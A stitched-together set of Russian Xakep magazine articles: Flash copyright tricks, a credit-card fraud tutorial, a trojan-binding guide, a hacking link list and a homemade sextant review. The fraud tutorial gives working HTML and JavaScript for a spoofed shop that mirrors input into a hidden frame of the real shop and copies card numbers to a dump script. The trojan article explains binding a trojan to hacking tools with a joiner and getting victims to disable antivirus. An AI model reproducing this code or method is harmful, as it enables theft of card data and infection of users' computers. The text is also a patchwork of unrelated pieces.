Кстати, совсем недавно нашлось новое применение этому методу. После рисования одного порнушного мультика про сокурсников я решил сделать разные варианты концовок - поприличнее и попошлее :). Сначала мульт, выложенный, как всегда, во многих местах и распространяющийся еще и на дискетах, был показан всем подряд, кроме героев моей скромной порнушки. А уже потом, когда весть о новой славе докатилась и до них, я удалил файлик, и новоиспеченные порнозвезды не увидели ничего страшного :). Вот так можно цивилизованным путем избежать кровопролития и страшной мести :). Для этого в код нужно внести такие изменения:

if (this.hardcore=1){

gotoandplay("Scene 2", 1)

}else{

gotoandplay("Scene 3", 1)

}

Так мы просто программируем ветвление, зависящее только от файла. Можно расширить нашу степень влияния на сюжет, если сделать ветвление многогранным (я вот измерял степень хардкора в двоичной системе, а можно было бы и в десятичной :)). То есть оперировать не удалением файла, а изменением значения переменной. Подумай над этим на досуге.

ЗАЩИТА УМНАЯ, ОБЪЕКТНО-ОРИЕНТИРОВАННАЯ

Но просто прятать мультик от плагиаторов - это мелочь. Высший пилотаж заключается в том, чтобы заставить ИХ работать на ТЕБЯ :). Поэтом предлагаю тебе интересный и интеллектуальный метод не упустить своих посетителей и поднять популярность своего ресурса.

Я уверен, что во все сотворенные тобой мульты ты неизменно пихаешь свой копирайт. Ежику понятно, что сам он небольшой (дабы не мозолить глаза смотрящего) и расположен на отдельном леере (слое - по-русски). Вот модификацией этого слоя мы и займемся. Используя локально лежащий файл (как в первом примере), он будет меняться в зависимости от расположения флешки (вернее, от наличия текстовика рядом с ней).


Спецвыпуск Xakep, номер #029, стр. 029-074-3, МУЛЬТИКИ ПОД ЗАМКОМ - защищаем авторские Flash'ки

МУЛЬТИКИ ПОД ЗАМКОМ - защищаем авторские Flash'ки

Человек-Утюг

Спецвыпуск Xakep, номер #029, стр. 029-074-3

Мне кажется, что портить композицию буквицами "(с) by IronMAN" попросту глупо, если она и так лежит у меня на паге :). Поэтому я делаю копирайт невидимым, когда мультик смотрят из его родного местообитания (то бишь оттуда, куда положил его я). А вот если какой-то нахал спер мой мульт и положил к себе, копирайт появляется, причем закрывает своими полупрозрачными телесами пол-экрана :). Кстати, можно просто менять его размер в зависимости от расположения флешки, код получится не сложный. Но это на любителя :).

Итак, мы снова подгружаем переменную из файла в объект. Я привык делать весь мувик объектом (помогает от некоторых видов декомпиляции), поэтому данные гружу непосредственно в него. Если ты предпочитаешь другой способ компоновки объектов, фигачь твою переменную в объект с копирайтом. В любом случае должно получиться следующее (mycopy - объект с текстом копирайта):

if (this.nesperli=1){

this.mycopy._alpha=0

}else{

this.mycopy._alpha=70

}

Вот так грубо я заставляю плагиаторов ссылаться на меня и при желании рекламировать мой ресурс в сети (если вместо копирайта прописать урлу). Но можно добавить еще один подарочек любителям спереть чужое добро. Мы просто будем... редиректить всех подряд на нашу пагу с мультом, чтобы его не смотрели на стороне :). То есть чувак заходит на чужой сайт с нашим мультом, и его тут же перебрасывает на наш сайт, на ту страницу, где лежит этот же мульт. Юзеру пофиг, а нам приятно, да и счетчик крутится :).

Реализовать это проще простого. Не дожидаясь завершения заставки, в первом же загруженном кадре мы пытаемся подгрузить из файла переменную и форвардим юзера на свой сайт, если файла не обнаружено. А если обнаружен, то юзер и так на нашем сайте, и форвардить его куда-либо нам без мазы :). Подгрузка работает, как всегда, для локального файла, а в условии пишем следующее:

if (this.nesperli=1){

nextFrame()

}else{

getURL("http://www.realklya.nm.ru/klya.html", "_self")

}

Вот так мы победили кариес, перхоть и плагиаторов - красиво и изящно :).

НАПУТСТВЕННОЕ СЛОВО

Я не Ильич и давать конкретные решения не люблю :). Поэтому, если ты вдруг не справишься сам или вдруг придумаешь какой-то необычный способ применения подгружаемых переменных для защиты, - пиши мне, а я с удовольствием помогу или выслушаю совет. Всегда твой, Человек-Утюг.


Спецвыпуск Xakep, номер #029, стр. 029-076-1, НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

aDm

Спецвыпуск Xakep, номер #029, стр. 029-076-1

Кредитки – это именно то, за чем чаще всего охотятся большинство сетевых мошенников. Сейчас в Инете работает целая отрасль по добыванию рабочих номеров кредитных карт. Самый очевидный способ – это взлом онлайн-магазина или сервера банка с последующим уводом базы данных кредиток. Но это грубо и сложно, а я сейчас расскажу о менее очевидном и более простом способе, который применяют добытчики кред ;).

Никакого взлома тут не будет – чистое мошенничество :). И главное – все до опупения просто. Если сформулировать все коротко, то суть в том, что мошенники выбирают какой-нибудь онлайн-магазин, сдирают полностью его дизигн и структуру, регистрируют похожий домен, вывешивают все это на хосте и по возможности раскручивают. Дальше юзеры заходят на этот магазин, выбирают себе какой-нибудь хлам, заполняют форму с инфой о себе и о кредитке и ждут, пока им доставят товар. В это время поддельный магазин пересылает всю эту инфу реальному, не забыв оставить у себя копию. Получается, что реальный магазин получает заказ, снимает деньги с креды и отправляет товар; юзверь получает товар, при этом с его креды честно снимаются соответствующие баблосы. А поддельный онлайн-магазин имеет полную инфу о кредитке юзера. Все довольны – все получили то, что хотели ;). Это называется насадкой на онлайн-магазин.

На словах все звучит очень просто, а на деле, как всегда, возникают всякие мелкие (и не очень) трудности – как в технологическом плане, так и в организационном. Сейчас попытаемся разобраться ;).

ОНЛАЙН-МАГАЗИНЫ: FAKE И REAL

Первый же вопрос – как сетевые мошенники выбирают магазин для насадки? На крупные магазины-монстры насаживаться бесполезно – их все знают, там четко отлаженная система верификации, дорогенные движки и прочая крутатень. Обычно для насадки выбирают небольшой магазин с не очень сложной структурой (чтоб самим, разбираясь, не встрять :)). В принятой в этой среде терминологии, такой магазин называют – "Real". То, что получается после его переработки и что в дальнейшем выкладывается на хост, называют – "Fake". Что и как перерабатывают, рассмотрим ниже, так как сначала надо разобраться, как все это работает.

НАСАДОЧНАЯ ТЕОРИЯ

Следующим как раз встает вопрос: как собственно fake-магазин будет переправлять заказы real-магазину? Современные web-технологии предоставляют разработчику огромное количество способов это осуществить :). Но для начала давай разберемся, как вообще работает простейший онлайн-магазин. Последовательность принципиально важных действий такая:

1. Юзер заходит на сайт.

2. Юзер заходит в каталог.

3. Юзер выбирает покупку.

4. Покупка кладется в корзину.

5. Юзер заполняет форму, забив инфу о кредитке и о себе, и отправляет ее.

А теперь смотри: в принципе, чтобы сделка состоялась, достаточно отправить real-магазину только самую последнюю форму. В ней обычно содержится, как уже говорилось, инфа о креде, о юзере и о товарах, которые он выбрал (скрытыми полями, заполняется автоматически из корзины). Соответственно, элементарный скрипт на fake-магазине может класть всю эту инфу куда-нибудь себе, а ее копию постить скрипту real-магазина. Но это не очень хорошо, так как все заказы вроде как будут приходить с одного IP (где хостится fake-магаз), а это может неслабо напрячь админов real-магазина. Поэтому способ, когда делается копия онлайн-магазина путем простого сдирания его дизигна, каталога товаров, а заказ в самом конце постится скриптом, не катит.


Спецвыпуск Xakep, номер #029, стр. 029-076-2, НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

aDm

Спецвыпуск Xakep, номер #029, стр. 029-076-2

Есть другой способ, имхо, более хитрый. Опять же делается fake-магазин с таким же дизигном как у real, опять же крадется весь каталог и выкладывается на хост с доменом с похожим названием. Только теперь в окно браузера загружаются странички сразу обоих магазинов: и real и fake, при этом real-магазин находится во фрейме с размером 0, и его не видно, а fake-магазин занимает все оставшееся место, то есть все окно. При этом все действия, которые юзер производит в видимой ему части (на страничках fake-магазина), при помощи явовских скриптов дублируются в невидимом для него нулевом фрейме (на страничках real-магазина). Выглядит все это так: юзер случайно находит онлайн-магазин (естественно, не подозревая, что это fake’овый, насадочный магаз), шастает по его каталогу, выбирает себе барахло и отправляет форму с инфой. На протяжении всего этого времени у него в нулевом фрейме тусуются соответсвующие странички реального магазина, о котором он и не подозревает. Когда он заходит на основную страничку фейкового магазина, ему автоматически в невидимую область загружается основная страничка реального магазина. Когда он в фейковом магазине кликает ссылочку "Каталог" и попадает в раздел каталога, точно также, но автоматически, нажимается ссылка "Каталог" и загружается страница каталога в невидимой области. По сути получается, что у админов реального магазина складывается картина, как будто юзер ходил по их сайту, лазил в их каталог, заполнял и постил их форму. Как такая хитрая штука кодится – разберемся ниже.

КОДИНГ НАСАДКИ

Давай в чисто образовательных целях создадим небольшую модель насадки на онлайн-магазин :). Для начала надо создать главную страничку фейкового сайта, состоящую из двух фреймов – в одном будет реальный магаз, в другом фейковый. Для этого пишем такую index.html:

------ index.html ------

<html><head><title>::: Лучший онлайн-магазин :::</title></head>

<frameset cols="50%,50%">

<frame src=real.html name=real>

<frame src=fake.html name=fake>

</frameset>

------ index.html ------

Пока что - для наглядности – не будем загонять левый фрейм в ноль, пускай оба фрейма занимают по 50% от всего окна браузера, так нам будет понятнее, что происходит. Потом я покажу, как фрейм загоняют в ноль.

Теперь давай посмотрим, какие действия юзера с фейковой паги надо эмулировать на реальной. Первое – это клик на ссылку. Надо чтоб при клике на ссылку в правом фрейме и при переходе в раздел, скажем, "Каталог", реальный магазин в левом фрейме тоже переходил в раздел "Каталог". Создадим два хтмл-файла:

------ fake.html ------

<html><head><title>::: Лучший онлайн-магазин :::</title>


Спецвыпуск Xakep, номер #029, стр. 029-076-3, НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

aDm

Спецвыпуск Xakep, номер #029, стр. 029-076-3

<script language=JavaScript>

function doGo()

{

parent.window.real.location.href="link2.html"

}

</script></head>

<body>

Поддельный онлайн-магазин

<a href=link1.html OnClick="doGo();">[Каталог товаров]</a>

</body></html>

------ fake.html ------

------ real.html ------

<html><head><title>::: Лучший онлайн-магазин :::</title></head>

<body>

Реальный онлайн-магазин<br>

<a href=link2.html>[Каталог товаров]</a>

</body></html>

------ real.html ------

Качай все это на сервак и пробуй. При нажатии на ссылку "Каталог товаров" в правом фрейме и загрузке в нем файла link1.html, в левом фрейме должен загружаться файл link2.html. Ощутил силу :)? Поехали дальше.

Следующее геморройное действие юзера, которое надо дублировать – это заполнение форм. Дополняй файлы fake.html и real.html следующим образом:

------ fake.html ------

<html><head><title>::: Лучший онлайн-магазин :::</title>

<script language=JavaScript>

function doSubmit()

{

parent.real.document.real_form.submit()

}

function doChange()

{

parent.real.document.real_form.CC_num.value=parent.fake.document.fake_form.text1.value

}

function doGo()

{

parent.window.real.location.href="link2.html"

}

</script></head>

<body>

Поддельный онлайн-магазин

<form method=post action=/cgi-bin/dumpCC.cgi name=fake_form>

<input type=text name=text1 onChange="doChange();">

<input type=submit value=" ok " onClick="doSubmit();">

</form>

<br>

<a href=link1.html OnClick="doGo();">[Каталог продуктов]</a>

</body></html>

------ fake.html ------

------ real.html ------

<html><head><title>::: Лучший онлайн-магазин :::</title>

</head>

<body>

Реальный онлайн-магазин<br>

<form method=post action="/cgi-bin/orderSend.cgi" name=real_form>

<input type=text name=CC_num>

<input type=submit value=" ok ">

</form>

</body></html>

------ real.html ------

И еще надо создать две cgi’шки – это в тестовых целях, чтоб мы видели, что вся инфа из форм постится правильно. Создавай файлы с одинаковым содержанием dumpCC.cgi и orderSend.cgi и швыряй их в папку cgi-bin.

------ dumpCC.cgi/orderSend.cgi ------

#!/usr/bin/perl

print "Content-type:text/html\n\n";

print <STDIN>;

------ dumpCC.cgi/orderSend.cgi ------

Теперь заливай, и проверяем. При изменении текстового поля в правом фрейме, текстовое поле в левом фрейме тоже меняется! Но это еще не все: при нажатии кнопаря "Ok" и отправке формы из правого фрейма, форма в левом фрейме тоже отправляется! Получается, что юзер заполняет форму в видимом фрейме – при этом точно так же заполняется форма в невидимом фрейме – и отправляет ее, одновременно отправляя форму из невидимого фрейма.

Кстати, по поводу невидимости: перепиши index.html следующим образом, и левый фрейм уберется у тебя за край экрана – станет невидимым.


Спецвыпуск Xakep, номер #029, стр. 029-076-4, НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

НАСАДКА НА ОНЛАЙН-МАГАЗИН - технология перехвата кред

aDm

Спецвыпуск Xakep, номер #029, стр. 029-076-4

------ index.html ------

<html><head><title>::: Лучший онлайн-магазин :::</title></head>

<frameset cols="0,*" frameborder=0>

<frame src=real.html name=real noresize>

<frame src=fake.html name=fake>

</frameset>

------ index.html ------

НА КОНЕЦ

Как видишь, все очень просто, даже если учесть, что при настоящей насадке на магазин гимора в сто раз больше. Главное технология – остальное дело техники ;). Удачного тебе самообразования и если будешь что-нибудь покупать в онлайне, загляни в исходник паги – не насаженный ли это магаз.


Спецвыпуск Xakep, номер #029, стр. 029-080-1, САЛО В ШОКОЛАДЕ - грамотно всовываем «хакеру» трояна

САЛО В ШОКОЛАДЕ - грамотно всовываем «хакеру» трояна

Космос(nkvd@zapisi.ru), Дронич

Спецвыпуск Xakep, номер #029, стр. 029-080-1

Здарова, чувака! Хотел ли ты когда-нибудь Интернету на халявку? А красивую тетю Асю или чего другого? Это был риторический вопрос - безусловно хотел. Например, мне за две недели упало 10-11 писем с вирем «Klez» - это говорит о твоем необъятном желании.

Итак, ты брал трояна и посылал его в почтовый ящик жертвы. А потом грязно рыгал - мол, где сокровища-то. Правильно - либо Вася Голум, которого ты заспамил инфекционным заболеванием, не полный лох, либо антивирю не понравился аттач. Моя же задача рассказать, как прокатить Васечку и его антитрояновую сигнализацию. Минус способа состоит в том, что он ориентирован на человека, которому нужен троян или какая другая хацкая прога. Проще говоря - на юзера с большими амбициями.

Чо такое троян?

Сделаю лирическое отступление для тех, кто в бункере. Троянку все любят обзывать вирусом, что есть весьма ошибочно. На самом деле это обыкновенная программа, которая выполняет определенные действия. Вредоносной ее назвать нельзя хотя бы потому, что она полезна автору идеи - тебе :).

Трояны делятся на три типа:

1) Бэкдор - работает через систему клиент-сервер. Ты можешь управлять компом вражины почти как своим - ну там сидюку открыть или ребут сделать.

2) Мыльный троян - самый распространенный - шлет тебе по мылу сокровища разные.

3) Кейлоггер - почти такое же чудо типа мейл-коня, но только следит за нажатием клавишного инструмента и шлет логи по мылу.

В принципе, нам абсолютно наплевать, какой троян выбрать - ведь в зависимости от целей можно заюзать любой из них. Кейлоггер пригодится, если жертва - параноидальная тварюга и вбивает пароли ручками. Бэкдор хорошо ставить на систему с постоянным айпишником, то есть висящую в локале или на выделенке. Хотя больше всего мне все равно нравятся именно мыльные трояны - сделав свое черное дело, они умеют испаряться и не оставлять за собой ровным счетом никаких следов. Словом, о пенетрейшене не узнает никто. И вот почему.

Idea & Requirements

Не спорю, ты уже качал трояны с «мега-хацкерских» страниц, но они у тебя не работали, а если и работали, то на следующий день подозрительно быстро кончался Инет. Да, умные люди, написав ВИЧ-инфекцию, троянят ее, чтобы со своих трудов поиметь того, кто этими трудами и воспользовался. Как? Очень просто - программулиной, разработанной, видимо, Организацией Объединенных Наций, что откликается в поисковике на кличку «Joiner». Все, что требуется, - это склеить свой троян с другим. Но для того чтобы воспользоваться этой фичей, надо написать (!) своего (!!) оригинального (!!!) трояна, ибо только так он останется непойманным современными антивирями. Но мы же любим простые решения, поэтому морочиться не будем и сыграем на хацкерских чувствах жертвы.

Как известно, политика антивирусников такова, что в разряд опасных они загоняют ЛЮБЫЕ проги, связанные с секьюрити (так буржуи на официальном языке зовут хакинг). То есть портсканер - троян, шароискатель - троян, а уж бруфорсер-то вообще мегагипервирус :). Это если верить дядьке Касперскому. Сечешь фишку? Да, мы затрояним хацкерскую прогу в надежде на то, что юзер на время работы с ней отключит антивирь (а надо сказать, что работать со включенным она просто не будет). А чтобы сделать нашу надежду не такой призрачной, зафигачим в архив с прогой еще и ридмиху на тему - "файрволл лается, убить гада". Вот с этой социальной инженерии и стоит начать наше черное дело.


Спецвыпуск Xakep, номер #029, стр. 029-080-2, САЛО В ШОКОЛАДЕ - грамотно всовываем «хакеру» трояна

САЛО В ШОКОЛАДЕ - грамотно всовываем «хакеру» трояна

Космос(nkvd@zapisi.ru), Дронич

Спецвыпуск Xakep, номер #029, стр. 029-080-2

Тебе потребуются четыре вещи: именно коняра, полезная хацкерская прога, желательно небольшая, или чужой трой, Joiner, - склеивать эти все дела и софтинка для смены иконки - подойдет любая прога для вскрытия экзешников (смотри в WINformation в этом же номере). Ну а также желательно иметь мозг и прямые такие руки. Ссылки на требуемые объекты давать не имеет смысла, ибо долго они не живут :). Советую сбегать на сайт любой хак-крю - у них ты и обретешь добро. Предостерегу тебя лишь в одном - все скачиваемое тобой может быть также затроянено, и ты реально подставляешься. Есть один выход - качать сорцы, а потом их компилить. Вот сорцы для джойнера на Делфи: http://www.nccom.ru/ubb/Forum8/HTML/000086.html и http://delphi.mastak.ru/download/240.zip. То же самое и с троянами - ТОЛЬКО исходники, иначе иметь твою жертву будет еще пол-Инета. Не сильно сложный троян можно и сгенерить самому - если Инет твой друг. Ибо в нем полно мануалов по написанию коней, например: http://mazafaka.ru/articlez/00000047.php.

Делаем и впариваем механизм

Сделать террориста проще некуда. Для примера я использовал MJ, якобы модифицированный джойнер. Его можно взять здесь: http://www.uinc.ru/files/sintez/MJ_Setup.exe. Или просто посмотри на скрины. Итак, запускаем, пишем в первой строчке путь к файлу, к которому надо приаттачить троян, а во второй - прописью путь именно к твоему пони. Менять иконку можно в нем же потом при помощи прог-потрошителей. Склеенный экзэшник генерируется в «result.exe», который без проблем переименовывается. Впарить по мылу, конечно, можно, но в последнее время все стали такие умные, что вряд ли прокатит - во всем виноват ][, кстати :). На прокат такого варианта надеяться можно долго.

В наших же интересах заставить жертву скачать затрояненную фишку самолично :). То есть максимум, что мы можем сделать, - это подкинуть ей линку на сайт, на котором и лежит это чудо. А уж организовать этот сайт - дело техники и пары номеров из серии по вебу :).

Если ты уже сделал свою страницу в сети, то впаривать можно прямо с нее. Ежели руки коротки или времени нет - пойдет децльная страничка на каком-нибудь "народе", склепать которую в генераторе можно за полминуты. Пример, как «дают скачать интересную программу», смотри здесь: http://nadoelo.itgo.com/index.html и http://beeliner.narod.ru - забавно довольно-таки.

Итого

Юзза запускает твое детище и наслаждается тем, чего он возжелал, а тем временем маленький пони работает как афромэн на плантации. Советуем вставить лошадку в программу, которая ОБЯЗАТЕЛЬНО требует выхода в Инет - портсканер или трейсер, к примеру. Таким образом реально получить отдачу практически мгновенно. Если все пройдет нормально - будешь иметь и диалап, и возможность поприкалываться со спертым контакт-листом, и подефейсить. Смотри только сам не попади - даже на солидных сайтах могут быть лажа и кидалово. Иди спать и перед сном прочти «Отче наш» задом наперед. И все время проговаривай вслух: «Только сорцы, только сорцы...».


Спецвыпуск Xakep, номер #029, стр. 029-082-1, haX0rz4haX0rz - Инфа для пагокодера в сети

haX0rz4haX0rz - Инфа для пагокодера в сети

Frozen (frozen@real.xakep.ru)

Спецвыпуск Xakep, номер #029, стр. 029-082-1

Вот и пришла пора размять свои шаловливые ручонки, устроив тотальный дестрой всем и вся. И пусть они не давят по линкам с рекламой на твоем сайте, чтобы поддержать твое благосостояние, мы же ведь и без этого сможем накрутить свои счетчики путем хитроумных скриптов и несложных примочек, присутствующих тут и там в Интернете. Глядишь, и твой сайт скоро раскрутится и станет настоящим гигантом по посещению. А эти приятные циферки, обозначающие количество посещений, всегда будут радовать твой глаз своим ежедневным нарастанием на несколько сотен... да нет, пожалуй, лучше тысяч... каждый день...

Дока: DOMAIN NAMES - CONCEPTS AND FACILITIES

Линк: http://www.rfc-editor.org/rfc/rfc1034.txt

Начнем мы, пожалуй, с серьезных, официальных документов, а именно - RFC за номером 1034, который освещает такую тему, как "Доменная система имен - концепция и обслуживание". Здесь ты найдешь базовую информацию о том, что это такое, как происходит именование и поиск айпишника по адресу, и освоишь структуру запросов к ДНС-серверу. Поскольку документов, относящихся к ДНС, существует довольно много, я выбрал именно этот, как самый первый для изучения основ работы сервиса, а также советую обратить внимание на запрос 1912, в котором рассматриваются общие настройки и ошибки, которые может допустить админ при конфигурации сервера. Ну, а в конце запроса предлагаются ссылки на другие доки, относящиеся к этой тематике.

Рекомендовано: для общего изучения всем.

Дока: Подделка web-узлов

Линк: http://security.tsu.ru/info/www/security16.txt

Некоторое количество информации о том, что такое подделка веб-узлов и как можно от этого защититься. Предоставлена информация о различных способах подмены адреса или просто обыкновенного спуфинга. Конечно, основной упор делается на описание проблемы и способы защиты от этого, но ты для себя тоже можешь найти много интересного и увлекательного. Многие способы рассмотрены довольно подробно, так что не составит труда воспользоваться предоставленной информацией в своих "благих" целях.

Рекомендовано: мошенники всех стран - объединяйтесь :)!

Дока: Happy Hacker - Guides to (mostly) Harmless Hacking - GTMHH

Линк: http://www.happyhacker.org/gtmhh/gtmhh2.shtml

Довольно обстоятельная книга, а точнее он-лайн руководство "Безопасный хакинг". Пригодится для всякого, кто хоть как-то связан с компьютерным взломом. Много информации, конечно, уже устаревшей, предоставлено на "страницах" данного руководства, но надо отметить - есть и довольно интересные и обстоятельные главы. Включено сюда довольно много всяких тем, начиная от чего-то вроде "как получить хороший шелл" и заканчивая полезными советами, "как использовать веб для поиска инфы для хакинга". В заключение могу сказать, что особых трудностей при чтении ты не ощутишь (разве что может тебя отпугнуть буржуинский, на котором написан талмуд) и все руководства понятны и усвояемы :) обычным пользовательским умом :). Хотя тут есть информация и довольно сложная для понимания, но в таких местах присутствуют пометки "для новичков", поэтому стоит заглянуть сюда ради интереса.


Спецвыпуск Xakep, номер #029, стр. 029-082-2, haX0rz4haX0rz - Инфа для пагокодера в сети

haX0rz4haX0rz - Инфа для пагокодера в сети

Frozen (frozen@real.xakep.ru)

Спецвыпуск Xakep, номер #029, стр. 029-082-2

Рекомендовано: начинающим и не только кулксакепам.

Дока: Учебник по Macromedia Flash 5

Линк: http://zona5.al.ru/book/index.html

Флэш является сегодня довольно распространенной фишечкой, которую применяют где только можно и где нельзя, и этим невозможно не воспользоваться. Ведь в твоем распоряжении довольно мощный язык программирования с большим количеством всяких примочек. Этот учебник поможет тебе освоить все тонкости флэшодизайна и в частности обучит основам ActionScript. Конечно, тут не рассматриваются способы написания вредоносных программ, но, изучив всю предоставленную инфу, ты уже сам сможешь изобразить что-нибудь хитрое, с ма-а-аленькой такой недокументированной функцией :)...

Рекомендовано: флэшо-сайто-строителям.

Дока: Microsoft + Internet = ActiveX

Линк: http://lik-bezzz.narod.ru/activex_what.htm

Да, это всего лишь статья, статья по основам применения ActiveX в своих веб-страничках. Но вся шняжка в том, что ActiveX является практически полноценной программой, способной сотворить с компьютером все, что твоей душе угодно. Элементы ActiveX можно писать практически на любом языке программирования и уж тем более на всем известном ВизуалВасике. Ну, а чтобы ты окончательно убедился в полезности этой фичи, лучше автора доки я сказать не смогу - "отсутствие защитной оболочки виртуальной машины позволяет расширить функциональность компонентов ActiveX - им доступен такой прямой и эффективный контроль над компьютером..." :). Я думаю этими словами сказано все и даже больше :), а если еще учесть всестороннюю глюкавость и "секьюрность" любого продукта от небезызвестной корпорации Microsoft, то можно сказать, что при использовании этой технологии получится просто-таки монстр в обличье безобидной странички Василия Пуповидзе... Так что прими во внимание и изучай эту интересную тулзу.

Рекомендовано: любителям интерактивности на сайте, знающим васик.

Дока: Практическое введение в программирование на JavaScript

Линк: http://www.library.by/data/002/004/controlpanel/frameset.htm

Виртуальный аналог книги по Ява Скрипту ждет тебя по этой ссылочке. Все, начиная от азов и заканчивая сложными примерами по созданию крупных приложений на этом языке, ты сможешь изучить, просматривая данный линк. Представь, сколько интересностей можно натворить с компутером обычного странника Интернета, случайно забредшего на твой сайт. И хотя нельзя получить полный контроль над машиной, используя Java Script, получится конкретно подпортить его безоблачно-шоколадное существование :) или хотя бы можно вывалить кучу окон с порнорекламой, чтобы хоть как-то оправдать гордое звание заподлянщика и накрутить все свои возможные счетчики.

Рекомендовано: пагостроителям-программистам.

Дока: Социальная инженерия в реверс-инженеринге

Линк: http://netsecurity.r2.ru/docs/cosial.html

Согласись, ты ведь всегда мечтал на халяву поиметь серийный номер к какой-нибудь полезной программке, да еще и так, чтобы было все зарегистрировано на твое имя. Конечно, ты можешь сказать, что есть всякая astalavista, где без труда можно найти лекарство практически для всех продуктов программерской мысли, но, представь, ведь гораздо приятнее иметь полноценный зарегистрированный продукт, да еще и пользоваться техподдержкой можно будет. О том, как все это провернуть, особо не напрягаясь, рассказывает спец по психологии разработчиков программ - Bad_guy. Изучив предложенный материал, ты не только сможешь изобретать всякие интересные способы добывания легальных продуктов, но также сможешь применять некоторые приемы в твоей обычной жизни. В общем, поле деятельности тут огромное, и, думаю, тебе будет интересно ознакомиться с этим документиком. В общем, изучай, и, надеюсь, для тебя не будет большой проблемой получение нормальных работающих продуктов...


Спецвыпуск Xakep, номер #029, стр. 029-082-3, haX0rz4haX0rz - Инфа для пагокодера в сети

haX0rz4haX0rz - Инфа для пагокодера в сети

Frozen (frozen@real.xakep.ru)

Спецвыпуск Xakep, номер #029, стр. 029-082-3

Рекомендовано: для интересующихся психологией.


Спецвыпуск Xakep, номер #029, стр. 029-086-1, ТВОЙ ПЕРВЫЙ СЕКСТАНТ! (Рецензия на устройство)

ТВОЙ ПЕРВЫЙ СЕКСТАНТ! (Рецензия на устройство)

Спецвыпуск Xakep, номер #029, стр. 029-086-1

Программа для печати шкалы

Пластиковая заготовка со шкалой и выкройкой шарнира

Секстант со снятым шарниром и зеркалами

Секстант в сборе

Измерение угла солнца на горизонте с помощью сектанта.

Разметка компакта и коробки под сектант

Сектант на основе компакта и коробки в собранном и разобранном виде

Измерение угла солнца над горизонтом с помощью CD-сектанта.

Пляшите от счастья любители ежемесячного паяльника! На этот раз наше паяло получилось просто мега огромным! Сначала Деметрас подогнал профессиональный аппарат для дистилляции воды. Это рабочее устройство, которое можно попробовать изготовить самостоятельно и быть ближе к звездам, упившись дистиллированной водичкой. Потом меня проперло от спутников, от спутникового Интернета и телевидения, и я посветил основной паяльник знакомству с доступными спутниковыми технологиями. И вот, наконец, перед сдачей номера в Интернете откопалось очень полезное устройство – самодельный секстант! Прочитав статью о спутниках, ты поймешь, что тебе понадобиться определить положение нужного объекта на небосводе. Для этого тебе понадобится определить азимутальный угол (направление по компасу) и угол возвышения объекта над горизонтом. Для второго и может пригодиться секстант. Конечно, секстант можно использовать и для других полезных вещей, таких как навигация. Но нам нужно определить возможность установки спутниковой антенны, а для этого надо знать, не мешают ли препятствия, закрывающие горизонт.

О том, что такое сектант, можно прочитать здесь кратко: http://www.rirt.ru/history/navigation/xviii-century.htm. А здесь можно подробно почитать о принципах использования сектанта в навигации: http://canegor.urc.ac.ru/astronomy/309.htm.

От себя скажу, что сектант – это устройство для измерения угла между двумя светилами или между светилом и объектом на горизонте. Допустим, чтобы измерить угол солнца над горизонтом, нужно направить полупрозрачное зеркальце на горизонт, а вторым зеркальцем направить отражение солнца таким образом, чтобы совместить изображение солнца и горизонта на полупрозрачном зеркальце. В этом случае шарнир, на котором закреплено второе зеркало, покажет нужный угол на шкале.

Итак, что же навоял Дэвис на сайте http://www.tecepe.com.br/nav/XTantProject.htm.

Он надыбал где-то кусочек пластика, на который приклеил бумажную шкалу, напечатанную на компе. Кстати на том же сайте ты можешь найти программу для печати нужной тебе шкалы. Ты можешь напечатать шкалу сразу на пластике. Для этого нужно купить в канцелярском магазине «прозрачку» для презентационных проекторов. Бывают прозрачки и для струйных и для лазерных принтеров. Готовую шкалу нужно будет приклеить к твердой основе: к картонке или фанерки.

Дальше нужен шарнир, на котором будет зеркальце измерения угла. Работа секстанта проста – одно полупрозрачное зеркальце направляют на горизонт или на луну, в общем на точку, от который собрались откладывать угол. Второе зеркальце направляют на светило, относительно которого решили померить угол. Второе зеркальце подвижно закреплено на шарнире, который указывает значение угла на шкале.


Спецвыпуск Xakep, номер #029, стр. 029-086-2, ТВОЙ ПЕРВЫЙ СЕКСТАНТ! (Рецензия на устройство)

ТВОЙ ПЕРВЫЙ СЕКСТАНТ! (Рецензия на устройство)

Спецвыпуск Xakep, номер #029, стр. 029-086-2

Больше всего геморроя предстоит как раз с изготовлением полупрозрачного зеркальца и закреплением его. Дэвис оттер половинку зеркального слоя средствами для мытья окон. Для измерения углов солнца он использовал затемнитель, изготовленный из слайда.

Также полезно будет глянуть секстант, изготовленный на базе компакт-диска на страничке http://www.tecepe.com.br/nav/CDSextantProject.htm. Тут все еще проще. Если вставить компакт в коробку для компактов, то получиться удобный шарнир. Осталось только приклеить к компакту деталь от детского конструктора, а к ней приклеить зеркальце. Также можно распечатать на компьютере шкалу и приклеить ее к компакт-диску. Полупрозрачное зеркальце приклеивают к коробке жестко.


Спецвыпуск Xakep, номер #029, стр. 029-088-1, Паяльник на службе WEB-мошенников

Паяльник на службе WEB-мошенников

Спецвыпуск Xakep, номер #029, стр. 029-088-1

Если у тебя есть свои радио-

новости,

приколы,

методы,

решения,

инструменты,

устройства,

мнение,

поделись с нами. Прием радиомыслей на Dr.Cod@online.ru

Новость: Добрянский свихнулся... на...

То, что Док свихнулся, для тебя уже не новость - за то и держат. Новость в другом, на этот раз я свихнулся на спутниковых технологиях. Буду ставить сам спутниковую тарелку и, естественно, подключать ее к компу. Так что у кого есть опыт - срочно откликайтесь, куда слать твои спутниковые радиомысли, объяснять не надо! Ну а постоянные читатели в результате этого зверского эксперимента получат удобоваримый материал по теме "компьютер + спутник". Вот только не надо флеймить, что я сам ничего не понимаю! По специальности я телекоммуникатор, астрономии меня учил сам Серж Коробкин (один из основателей московской астрашколы), про то, что я родился с паяльником в руках, уточнять не будем. Так что осталось сориентироваться в пространстве и на рынке. Этим мы и займемся в сегодняшнем "Паяльнике". То есть сегодня я расскажу тебе, с чего начать, точнее с чего начал я.

Прикол: спутниковое web-мошенничество!

Ага, не ожидал? Еще одна новость: теперь все "Паяльники" я буду привязывать к теме номера, так что подгоняй радиомысли и радиовымыслы по теме из анонса ближайших Cпецов!

